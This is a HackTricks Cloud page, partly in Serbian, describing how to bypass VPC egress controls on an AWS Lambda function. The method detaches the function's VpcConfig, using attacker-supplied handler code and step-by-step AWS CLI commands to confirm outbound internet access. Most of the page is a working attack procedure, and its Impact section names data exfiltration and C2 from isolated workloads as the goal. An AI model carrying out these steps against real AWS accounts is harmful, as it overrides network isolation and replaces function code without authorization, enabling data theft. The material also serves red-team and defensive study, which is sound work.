AWS Lambda – VPC Egress Bypass by Detaching VpcConfig

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Force a Lambda function out of a restricted VPC by updating its configuration with an empty VpcConfig (SubnetIds=[], SecurityGroupIds=[]). The function will then run in the Lambda-managed networking plane, regaining outbound internet access and bypassing egress controls enforced by private VPC subnets without NAT.

Abusing it

Preduslovi: lambda:UpdateFunctionConfiguration na ciljnoj funkciji (i lambda:InvokeFunction za validaciju), plus permisije za update code/handler ako ih menjate.
Pretpostavke: Funkcija je trenutno konfigurisana sa VpcConfig koji pokazuje na private subnets bez NAT (dakle outbound internet je blokiran).
Region: us-east-1

Steps

Prepare a minimal handler that proves outbound HTTP works

cat > net.py <<‘PY’ import urllib.request, json

def lambda_handler(event, context): try: ip = urllib.request.urlopen(‘https://checkip.amazonaws.com’, timeout=3).read().decode().strip() return {“egress”: True, “ip”: ip} except Exception as e: return {“egress”: False, “err”: str(e)} PY zip net.zip net.py aws lambda update-function-code –function-name $TARGET_FN –zip-file fileb://net.zip –region $REGION || true aws lambda update-function-configuration –function-name $TARGET_FN –handler net.lambda_handler –region $REGION || true

Record current VPC config (to restore later if needed)

aws lambda get-function-configuration –function-name $TARGET_FN –query ‘VpcConfig’ –region $REGION > /tmp/orig-vpc.json cat /tmp/orig-vpc.json

Detach the VPC by setting empty lists

aws lambda update-function-configuration
–function-name $TARGET_FN
–vpc-config SubnetIds=[],SecurityGroupIds=[]
–region $REGION until [ “$(aws lambda get-function-configuration –function-name $TARGET_FN –query LastUpdateStatus –output text –region $REGION)” = “Successful” ]; do sleep 2; done

Invoke and verify outbound access

aws lambda invoke –function-name $TARGET_FN /tmp/net-out.json –region $REGION >/dev/null cat /tmp/net-out.json

(Optional) Restore original VPC config

if jq -e ‘.SubnetIds | length > 0’ /tmp/orig-vpc.json >/dev/null; then SUBS=$(jq -r ‘.SubnetIds | join(“,”)’ /tmp/orig-vpc.json); SGS=$(jq -r ‘.SecurityGroupIds | join(“,”)’ /tmp/orig-vpc.json) aws lambda update-function-configuration –function-name $TARGET_FN –vpc-config SubnetIds=[$SUBS],SecurityGroupIds=[$SGS] –region $REGION fi

Impact

Povraća neograničen outbound internet iz funkcije, omogućavajući exfiltration podataka ili C2 iz workload-ova koji su namerno izolovani u private subnets bez NAT.

Example output (after detaching VpcConfig)

{“egress”: true, “ip”: “34.x.x.x”}

Cleanup

Ako ste napravili privremene promene u code/handler-u, vratite ih.
Opcionalno vratite originalni VpcConfig sačuvan u /tmp/orig-vpc.json kao što je prikazano iznad.

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Proverite planove pretplate!

Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.

Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.